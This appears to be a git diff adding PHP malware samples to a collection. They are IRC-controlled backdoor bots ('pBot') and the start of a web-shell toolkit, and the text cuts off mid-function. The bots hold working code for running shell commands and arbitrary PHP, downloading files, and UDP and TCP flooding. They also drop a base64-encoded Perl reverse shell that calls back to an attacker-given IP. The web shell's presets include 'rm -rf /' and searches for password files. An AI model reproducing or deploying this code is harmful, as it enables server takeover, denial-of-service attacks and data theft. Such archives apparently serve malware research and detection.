$nick = explode("!",$cmd[0]); + $vhost = explode("@",$nick[1]); + $vhost = $vhost[1]; + $nick = substr($nick[0],1); + $host = $cmd[0]; + if($msgcmd[0]==$this->nick) + { + for($i=0;$i2) + { + switch($cmd[1]) + { + case "QUIT": + if($this->is_logged_in($host)) + { + $this->log_out($host); + } + break; + case "PART": + if($this->is_logged_in($host)) + { + $this->log_out($host); + } + break; + case "PRIVMSG": + if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*")) + { + if(substr($mcmd[0],0,1)==".") + { + switch(substr($mcmd[0],1)) + { + case "user": + if($mcmd[1]==$this->config['password']) + { + $this->log_in($host); + } + else + { + $this->notice($this->config['chan'],"[\2Auth\2]: Senha errada $nick idiota!!"); + } + break; + } + } + } + elseif($this->is_logged_in($host)) + { + if(substr($mcmd[0],0,1)==".") + { + switch(substr($mcmd[0],1)) + { + case "restart": + $this->send("QUIT :restart commando from $nick"); + fclose($this->conn); + $this->start(); + break; + case "mail": //mail to from subject message + if(count($mcmd)>4) + { + $header = "From: <".$mcmd[2].">"; + if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header)) + { + $this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail."); + } + else + { + $this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2"); + } + } + break; + case "safe": + if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") + { + $safemode = "on"; + } + else { + $safemode = "off"; + } + $this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode.""); + break; + case "inbox": //teste inbox + if(isset($mcmd[1])) + { + $token = md5(uniqid(rand(), true)); + $header = "From: "; + $a = php_uname(); + $b = getenv("SERVER_SOFTWARE"); + $c = gethostbyname($_SERVER["HTTP_HOST"]); + if(!mail($mcmd[1],"InBox Test","#korban. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl ",$header)) + { + $this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send"); + } + else + { + $this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2"); + } + } + break; + case "conback": + if(count($mcmd)>2) + { + $this->conback($mcmd[1],$mcmd[2]); + } + break; + case "dns": + if(isset($mcmd[1])) + { + $ip = explode(".",$mcmd[1]); + if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) + { + $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1])); + } + else + { + $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1])); + } + } + break; + case "info": + case "vunl": + if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; } + else { $safemode = "off"; } + $uname = php_uname(); + $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)"); + $this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI'].""); + break; + case "bot": + $this->privmsg($this->config['chan'],"[\2bot\2]: phpbot 2.0 by; #korban."); + break; + case "uname": + if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; } + else { $safemode = "off"; } + $uname = php_uname(); + $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)"); + break; + case "rndnick": + $this->set_nick(); + break; + case "raw": + $this->send(strstr($msg,$mcmd[1])); + break; + case "eval": + $eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1]))); + break; + case "sexec": + $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); + $exec = shell_exec($command); + $ret = explode("\n",$exec); + for($i=0;$iprivmsg($this->config['chan']," : ".trim($ret[$i])); + break; + + case "exec": + $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); + $exec = exec($command); + $ret = explode("\n",$exec); + for($i=0;$iprivmsg($this->config['chan']," : ".trim($ret[$i])); + break; + + case "passthru": + $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); + $exec = passthru($command); + $ret = explode("\n",$exec); + for($i=0;$iprivmsg($this->config['chan']," : ".trim($ret[$i])); + break; + + case "popen": + if(isset($mcmd[1])) + { + $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); + $this->privmsg($this->config['chan'],"[\2popen\2]: $command"); + $pipe = popen($command,"r"); + while(!feof($pipe)) + { + $pbuf = trim(fgets($pipe,512)); + if($pbuf != NULL) + $this->privmsg($this->config['chan']," : $pbuf"); + } + pclose($pipe); + } + + case "system": + $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); + $exec = system($command); + $ret = explode("\n",$exec); + for($i=0;$iprivmsg($this->config['chan']," : ".trim($ret[$i])); + break; + + + case "pscan": // .pscan 127.0.0.1 6667 + if(count($mcmd) > 2) + { + if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15)) + $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2"); + else + $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2"); + } + break; + case "ud.server": // .ud.server [password] + if(count($mcmd)>2) + { + $this->config['server'] = $mcmd[1]; + $this->config['port'] = $mcmd[2]; + if(isset($mcmcd[3])) + { + $this->config['pass'] = $mcmd[3]; + $this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]." Senha: ".$mcmd[3]); + } + else + { + $this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]); + } + } + break; + case "download": + if(count($mcmd) > 2) + { + if(!$fp = fopen($mcmd[2],"w")) + { + $this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada."); + } + else + { + if(!$get = file($mcmd[1])) + { + $this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2"); + } + else + { + for($i=0;$i<=count($get);$i++) + { + fwrite($fp,$get[$i]); + } + $this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2"); + } + fclose($fp); + } + } + else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); } + break; + case "die": + $this->send("QUIT :die command from $nick"); + fclose($this->conn); + exit; + case "logout": + $this->log_out($host); + $this->privmsg($this->config['chan'],"[\2auth\2]: $nick deslogado!"); + break; + case "udpflood": + if(count($mcmd)>3) + { + $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]); + } + break; + case "tcpflood": + if(count($mcmd)>5) + { + $this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]); + } + break; + } + } + } + break; + } + } + } + $old_buf = $this->buf; + } + $this->start(); + } + function send($msg) + { + fwrite($this->conn,"$msg\r\n"); + + } + function join($chan,$key=NULL) + { + $this->send("JOIN $chan $key"); + } + function privmsg($to,$msg) + { + $this->send("PRIVMSG $to :$msg"); + } + function notice($to,$msg) + { + $this->send("NOTICE $to :$msg"); + } + function is_logged_in($host) + { + if(isset($this->users[$host])) + return 1; + else + return 0; + } + function log_in($host) + { + $this->users[$host] = true; + } + function log_out($host) + { + unset($this->users[$host]); + } + function set_nick() + { + if(isset($_SERVER['SERVER_SOFTWARE'])) + { + if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache")) + $this->nick = "[A]"; + elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis")) + $this->nick = "[I]"; + elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami")) + $this->nick = "[X]"; + else + $this->nick = "[U]"; + } + else + { + $this->nick = "[C]"; + } + $this->nick .= $this->config['prefix']; + for($i=0;$i<$this->config['maxrand'];$i++) + $this->nick .= mt_rand(0,9); + $this->send("NICK ".$this->nick); + } + function udpflood($host,$packetsize,$time) { + $this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]"); + $packet = ""; + for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); } + $timei = time(); + $i = 0; + while(time()-$timei < $time) { + $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5); + fwrite($fp,$packet); + fclose($fp); + $i++; + } + $env = $i * $packetsize; + $env = $env / 1048576; + $vel = $env / $time; + $vel = round($vel); + $env = round($env); + $this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s "); +} + function tcpflood($host,$packets,$packetsize,$port,$delay) + { + $this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]"); + $packet = ""; + for($i=0;$i<$packetsize;$i++) + $packet .= chr(mt_rand(1,256)); + for($i=0;$i<$packets;$i++) + { + if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5)) + { + $this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>"); + return 0; + } + else + { + fwrite($fp,$packet); + fclose($fp); + } + sleep($delay); + } + $this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port."); + } + function conback($ip,$port) + { + $this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port"); + $dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBleGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw=="; + if (is_writable("/tmp")) + { + if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); } + $fp=fopen("/tmp/dc.pl","w"); + fwrite($fp,base64_decode($dc_source)); + passthru("perl /tmp/dc.pl $ip $port &"); + unlink("/tmp/dc.pl"); + } + else + { + if (is_writable("/var/tmp")) + { + if (file_exists("/var/tmp/dc.pl")) { unlink("/var/tmp/dc.pl"); } + $fp=fopen("/var/tmp/dc.pl","w"); + fwrite($fp,base64_decode($dc_source)); + passthru("perl /var/tmp/dc.pl $ip $port &"); + unlink("/var/tmp/dc.pl"); + } + if (is_writable(".")) + { + if (file_exists("dc.pl")) { unlink("dc.pl"); } + $fp=fopen("dc.pl","w"); + fwrite($fp,base64_decode($dc_source)); + passthru("perl dc.pl $ip $port &"); + unlink("dc.pl"); + } + } + } +} + +$bot = new pBot; +$bot->start(); + +?> + + + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Pbot.g b/PHP/Backdoor.PHP.Pbot.g new file mode 100644 index 00000000..485eeb11 --- /dev/null +++ b/PHP/Backdoor.PHP.Pbot.g @@ -0,0 +1,366 @@ +"irc.chatbr.org", + "port"=>6667, + "pass"=>"", //senha do server + "prefix"=>"Twi", + "maxrand"=>8, + "chan"=>"#CS", + "key"=>"", //senha do canal + "modes"=>"+p", + "password"=>"twi123", //senha do bot + "trigger"=>".", + "hostauth"=>"*" // * for any hostname + ); + var $users = array(); + function start() + { + if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) + $this->start(); + $ident = "divouxd1"; + $alph = range("a","z"); + for($i=0;$i<$this->config['maxrand'];$i++) + $ident .= $alph[rand(0,25)]; + if(strlen($this->config['pass'])>0) + $this->send("PASS ".$this->config['pass']); + $this->send("USER $ident 127.0.0.1 localhost :$ident"); + $this->set_nick(); + $this->main(); + } + function main() + { + while(!feof($this->conn)) + { + $this->buf = trim(fgets($this->conn,512)); + $cmd = explode(" ",$this->buf); + if(substr($this->buf,0,6)=="PING :") + { + $this->send("PONG :".substr($this->buf,6)); + } + if(isset($cmd[1]) && $cmd[1] =="001") + { + $this->send("MODE ".$this->nick." ".$this->config['modes']); + $this->join($this->config['chan'],$this->config['key']); + } + if(isset($cmd[1]) && $cmd[1]=="433") + { + $this->set_nick(); + } + if($this->buf != $old_buf) + { + $mcmd = array(); + $msg = substr(strstr($this->buf," :"),2); + $msgcmd = explode(" ",$msg); + $nick = explode("!",$cmd[0]); + $vhost = explode("@",$nick[1]); + $vhost = $vhost[1]; + $nick = substr($nick[0],1); + $host = $cmd[0]; + if($msgcmd[0]==$this->nick) + { + for($i=0;$i2) + { + switch($cmd[1]) + { + case "QUIT": + if($this->is_logged_in($host)) + { + $this->log_out($host); + } + break; + case "PART": + if($this->is_logged_in($host)) + { + $this->log_out($host); + } + break; + case "PRIVMSG": + if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*")) + { + if(substr($mcmd[0],0,1)==".") + { + switch(substr($mcmd[0],1)) + { + case "user": + if($mcmd[1]==$this->config['password']) + { + $this->privmsg($this->config['chan'],"[\2Auth\2]: $nick logado!"); + $this->log_in($host); + } + else + { + $this->privmsg($this->config['chan'],"[\2Auth\2]: Senha errada! $nick"); + } + break; + } + } + } + elseif($this->is_logged_in($host)) + { + if(substr($mcmd[0],0,1)==".") + { + switch(substr($mcmd[0],1)) + { + case "restart": + $this->send("QUIT :restart"); + fclose($this->conn); + $this->start(); + break; + case "mail": //mail to from subject message + if(count($mcmd)>4) + { + $header = "From: <".$mcmd[2].">"; + if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header)) + { + $this->privmsg($this->config['chan'],"[\2mail\2]: Isur00tossivel mandar e-mail."); + } + else + { + $this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2"); + } + } + break; + case "dns": + if(isset($mcmd[1])) + { + $ip = explode(".",$mcmd[1]); + if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) + { + $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1])); + } + else + { + $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1])); + } + } + break; + case "info": + $this->privmsg($this->config['chan'],"[\2Vuln!\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."]"); + break; + case "bot": + $this->privmsg($this->config['chan'],"[\2Bot by matapato v1.2\2]"); + break; + case "cmd": + if(isset($mcmd[1])) + { + $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); + $this->privmsg($this->config['chan'],"[\2cmd\2]: $command"); + $pipe = popen($command,"r"); + while(!feof($pipe)) + { + $pbuf = trim(fgets($pipe,512)); + if($pbuf != NULL) + $this->privmsg($this->config['chan']," : $pbuf"); + } + pclose($pipe); + } + break; + case "rndnick": + $this->set_nick(); + break; + case "sur00t": + $this->send(strstr($msg,$mcmd[1])); + break; + case "php": + $eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1]))); + break; + case "exec": + $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); + $exec = shell_exec($command); + $ret = explode("\n",$exec); + $this->privmsg($this->config['chan'],"[\2exec\2]: $command"); + for($i=0;$iprivmsg($this->config['chan']," : ".trim($ret[$i])); + break; + case "pscan": // .pscan 127.0.0.1 6667 + if(count($mcmd) > 2) + { + if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15)) + $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2"); + else + $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2"); + } + break; + case "ud.server": // .ud.server [password] + if(count($mcmd)>2) + { + $this->config['server'] = $mcmd[1]; + $this->config['port'] = $mcmd[2]; + if(isset($mcmcd[3])) + { + $this->config['pass'] = $mcmd[3]; + $this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]." Senha: ".$mcmd[3]); + } + else + { + $this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]); + } + } + break; + case "download": + if(count($mcmd) > 2) + { + if(!$fp = fopen($mcmd[2],"w")) + { + $this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada."); + } + else + { + if(!$get = file($mcmd[1])) + { + $this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2"); + } + else + { + for($i=0;$i<=count($get);$i++) + { + fwrite($fp,$get[$i]); + } + $this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2"); + } + fclose($fp); + } + } + break; + case "die": + $this->send("QUIT :MORRI! comando por $nick"); + fclose($this->conn); + exit; + case "logout": + $this->log_out($host); + $this->privmsg($this->config['chan'],"[\2auth\2]: $nick deslogado!"); + break; + case "udpflood": + if(count($mcmd)>3) + { + $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]); + } + break; + case "tcpflood": + if(count($mcmd)>5) + { + $this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]); + } + break; + } + } + } + break; + } + } + } + $old_buf = $this->buf; + } + $this->start(); + } + function send($msg) + { + fwrite($this->conn,"$msg\r\n"); + + } + function join($chan,$key=NULL) + { + $this->send("JOIN $chan $key"); + } + function privmsg($to,$msg) + { + $this->send("PRIVMSG $to :$msg"); + } + function is_logged_in($host) + { + if(isset($this->users[$host])) + return 1; + else + return 0; + } + function log_in($host) + { + $this->users[$host] = true; + } + function log_out($host) + { + unset($this->users[$host]); + } + function set_nick() + { + if(isset($_SERVER['SERVER_SOFTWARE'])) + { + if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache")) + $this->nick = "[A]"; + elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis")) + $this->nick = "[I]"; + elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami")) + $this->nick = "[X]"; + else + $this->nick = "[U]"; + } + else + { + $this->nick = "[C]"; + } + $this->nick .= $this->config['prefix']; + for($i=0;$i<$this->config['maxrand'];$i++) + $this->nick .= mt_rand(0,9); + $this->send("NICK ".$this->nick); + } + function udpflood($host,$packetsize,$time) { + $this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]"); + $packet = ""; + for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); } + $timei = time(); + $i = 0; + while(time()-$timei < $time) { + $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5); + fwrite($fp,$packet); + fclose($fp); + $i++; + } + $env = $i * $packetsize; + $env = $env / 1048576; + $vel = $env / $time; + $vel = round($vel); + $env = round($env); + $this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s "); +} + function tcpflood($host,$packets,$packetsize,$port,$delay) + { + $this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]"); + $packet = ""; + for($i=0;$i<$packetsize;$i++) + $packet .= chr(mt_rand(1,256)); + for($i=0;$i<$packets;$i++) + { + if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5)) + { + $this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>"); + return 0; + } + else + { + fwrite($fp,$packet); + fclose($fp); + } + sleep($delay); + } + $this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port."); + } +} + +$bot = new pBot; +$bot->start(); + +?> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.PhpShell.h b/PHP/Backdoor.PHP.PhpShell.h new file mode 100644 index 00000000..7e16011f --- /dev/null +++ b/PHP/Backdoor.PHP.PhpShell.h @@ -0,0 +1,2026 @@ + 'AboutBox', + + 'DIR' => 'Dir browse', + 'UPL' => 'Upload file', + 'FTP' => 'FTP Actions', + + 'F_CHM' => 'File CHMOD', + 'F_VIEW' => 'File viewer', + 'F_ED' => 'File Edit', + 'F_DEL' => 'File Delete', + 'F_REN' => 'File Rename', + 'F_COP' => 'File Copy', + 'F_MOV' => 'File Move', + 'F_DWN' => 'File Download', + + 'SQL' => 'SQL Maintenance', + 'SQLS' => 'SQL Search', + 'SQLD' => 'SQL Dump', + 'PHP' => 'PHP C0nsole', + 'COOK' => 'Cookies Maintenance', + 'CMD' => 'C0mmand line', + + 'MAIL' => 'Mail functions', + 'STR' => 'String functions', + 'PRT' => 'Port scaner', + 'SOCK' => 'Raw s0cket', + 'PROX' => 'HTTP PROXY', + 'XPL' => 'Expl0its', + 'XSS' => 'XSS Server', + ); +$GLOB['DxGET_Vars']=array(/* GET variables used by shell */ +'dxinstant', 'dxmode', 'dximg', 'dxparam', 'dxval', 'dx_ok', 'dx_gzip', +'dxdir', 'dxdirsimple', 'dxfile', +'dxsql_s', 'dxsql_l', 'dxsql_p', 'dxsql_d','dxsql_q', +); + +$GLOB['VAR']['PHP']['Presets']=array( + /* Note, that no comments are allowed in the code */ + 'phpinfo' => 'phpinfo();', + 'GLOBALS' => 'print \'\'; print_r($GLOBALS);', + 'php_ini' => '$INI=ini_get_all(); ' + ."\n".'print \'<table border=0><tr>\'' + ."\n\t".'.\'<td class="listing"><font class="highlight_txt">Param</td>\'' + ."\n\t".'.\'<td class="listing"><font class="highlight_txt">Global value</td>\'' + ."\n\t".'.\'<td class="listing"><font class="highlight_txt">Local Value</td>\'' + ."\n\t".'.\'<td class="listing"><font class="highlight_txt">Access</td></tr>\';' + ."\n".'foreach ($INI as $param => $values) ' + ."\n\t".'print "\n".\'<tr>\'' + ."\n\t\t".'.\'<td class="listing"><b>\'.$param.\'</td>\'' + ."\n\t\t".'.\'<td class="listing">\'.$values[\'global_value\'].\' </td>\'' + ."\n\t\t".'.\'<td class="listing">\'.$values[\'local_value\'].\' </td>\'' + ."\n\t\t".'.\'<td class="listing">\'.$values[\'access\'].\' </td></tr>\';', + 'extensions' => '$EXT=get_loaded_extensions ();' + ."\n".'print \'<table border=0><tr><td class="listing">\'' + ."\n\t".'.implode(\'</td></tr>\'."\n".\'<tr><td class="listing">\', $EXT)' + ."\n\t".'.\'</td></tr></table>\'' + ."\n\t".'.count($EXT).\' extensions loaded\';', + ); +$GLOB['VAR']['CMD']['Presets']=array( + 'Call Nik8 with an axe'=>'[w0rning] rm -rf /', + 'show opened ports'=>'netstat -an | grep -i listen', + 'find config* files'=>'find / -type f -name "config*"', + 'find all *.php files with word "password"'=>'find / -name *.php | xargs grep -li password', + 'find all writable directories and files'=>'find / -perm -2 -ls', + 'list file attribs on a second extended FS'=>'lsattr -va', + 'View syslog.conf'=>'cat /etc/syslog.conf', + 'View Message of the day'=>'cat /etc/motd', + 'View hosts'=>'cat /etc/hosts', + 'List processes'=>'ps auxw', + 'List user processes'=>'ps ux', + 'Locate httpd.conf'=>'locate httpd.conf', + 'Interfaces'=>'ifconfig', + 'CPU'=>'/proc/cpuinfo', + 'RAM'=>'free -m', + 'HDD'=>'df -h', + 'OS Ver'=>'sysctl -a | grep version', + 'Kernel ver' =>'cat /proc/version', + 'Is cURL installed? ' => 'which curl', + 'Is wGET installed? ' => 'which wget', + 'Is lynx installed? ' => 'which lynx', + 'Is links installed? ' => 'which links', + 'Is fetch installed? ' => 'which fetch', + 'Is GET installed? ' => 'which GET', + 'Is perl installed? ' => 'which perl', + 'Where is apache ' => 'whereis apache', + 'Where is perl ' => 'whereis perl', + 'Pack directory' =>'"tar -zc /path/ -f name.tar.gz"', + ); + + +################################################################################### +####################+++++++++# F U N C T I O N S #+++++++++++++#################### +################################################################################### +function DxError($errstr) +{global $DX_Header_drawn;print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr>' + .'<td class=error '.((!$DX_Header_drawn)?'style="color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;position:absolute;top=0;left=0;"':'').'>' + .'Err: '.$errstr.'</td></tr></table>'."\n\n"; return '';} + +function DxWarning($warn) +{print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr><td class=warning><b>W0rning:</b> '.$warn.'</td></tr></table>'."\n\n"; return '';} + +function DxImg($imgname) +{ +global $DXGLOBALSHIT; +if ($DXGLOBALSHIT) return '<font class="img_replacer">'.$imgname.'</font>'; /* globalshit doesn't give a chance for our images to survive */ +return '<img src="'.DxURL('kill', '').'&dxmode=IMG&dximg='.$imgname.'" title="'.$imgname.'" alt"'.$imgname.'">'; +} + +function DxSetCookie($name, $val, $exp) +{ +if (!headers_sent()) return setcookie($name, $val, $exp, '/'); +?> +<script> +var curCookie = "<?=$name;?>=" + escape("<?=$val;?>") +"; expires=<?=date('l, d-M-y H:i:s', $exp);?> GMT; path=/;"; +document.cookie = curCookie; +</script> +<? +} + +function DxRandom($range='48-57,65-90,97-122') +{ +$range=explode(',',$range); +$range=explode('-', $range[ rand(0,count($range)-1) ] ); +return rand($range[0],$range[1]); +} + +function DxRandomChars($num) +{ +$ret=''; +for ($i=0;$i<$num;$i++) $ret.=chr(DxRandom('48-57,65-90,97-122')); +return $ret; +} + +function DxZeroedNumber($int, $totaldigits) +{ +$str=(string)$int; +while (strlen($str)<$totaldigits) $str='0'.$str; +return $str; +} + +function DxPrint_ParamState($name, $state, $invert=false) +{ +print $name.' : '; $invert=(bool)$invert; +if (is_bool($state)) + print ($state)?'<font color=#'.(($invert)?'FF0000':'00FF00').'><b>ON</b></font>':'<font color=#'.(($invert)?'00FF00':'FF0000').'><b>OFF</b></font>'; + else print '<b>'.$state.'</b>'; +} + +function DxStr_FmtFileSize($size) +{ + if($size>= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB"; } +elseif($size>= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB"; } +elseif($size>= 1024) {$size = round($size / 1024 * 100) / 100 . " KB"; } + else {$size = $size . " B";} +return $size; +} + +function DxDate($UNIX) {return date('d.M\'Y H:i:s', $UNIX); } + +function DxDesign_DrawBubbleBox($header, $body, $width) +{ +$header=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $header); +$body=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $body); +return ' onmouseover=\'showwin("'.$header.'","'.$body.'",'.$width.',1)\' onmouseout=\'showwin("","",0,0)\' onmousemove=\'movewin()\' '; +} + +function DxChmod_Str2Oct($str) /* rwxrwxrwx => 0777 */ +{ +$str = str_pad($str,9,'-'); +$str=strtr($str, array('-'=>'0','r'=>'4','w'=>'2','x'=>'1') ); +$newmode=''; +for ($i=0; $i<3; $i++) $newmode .= $str[$i*3]+$str[$i*3+1]+$str[$i*3+2]; + +return $newmode; +} + +function DxChmod_Oct2Str($perms) /* 777 => rwxrwxrwx. USE ONLY STRING REPRESENTATION OF $oct !!!! */ +{ +$info=''; +if (($perms & 0xC000) == 0xC000) $info = 'S'; /* Socket */ + elseif (($perms & 0xA000) == 0xA000) $info = 'L'; /* Symbolic Link */ +elseif (($perms & 0x8000) == 0x8000) $info = '&nbsp;'; /* '-'*//* Regular */ +elseif (($perms & 0x6000) == 0x6000) $info = 'B'; /* Block special */ +elseif (($perms & 0x4000) == 0x4000) $info = 'D'; /* Directory*/ +elseif (($perms & 0x2000) == 0x2000) $info = 'C'; /* Character special*/ +elseif (($perms & 0x1000) == 0x1000) $info = 'P'; /* FIFO pipe*/ +else $info = '?'; /* Unknown */ +if (!empty($info)) $info='<font class=rwx_sticky_bit>'.$info.'</font>'; +/* Owner */ +$info .= (($perms & 0x0100) ? 'r' : '-'); +$info .= (($perms & 0x0080) ? 'w' : '-'); +$info .= (($perms & 0x0040) ? + (($perms & 0x0800) ? 's' : 'x' ) : + (($perms & 0x0800) ? 'S' : '-')); +$info .= '/'; +/* Group */ +$info .= (($perms & 0x0020) ? 'r' : '-'); +$info .= (($perms & 0x0010) ? 'w' : '-'); +$info .= (($perms & 0x0008) ? + (($perms & 0x0400) ? 's' : 'x' ) : + (($perms & 0x0400) ? 'S' : '-')); +$info .= '/'; +/* World */ +$info .= (($perms & 0x0004) ? 'r' : '-'); +$info .= (($perms & 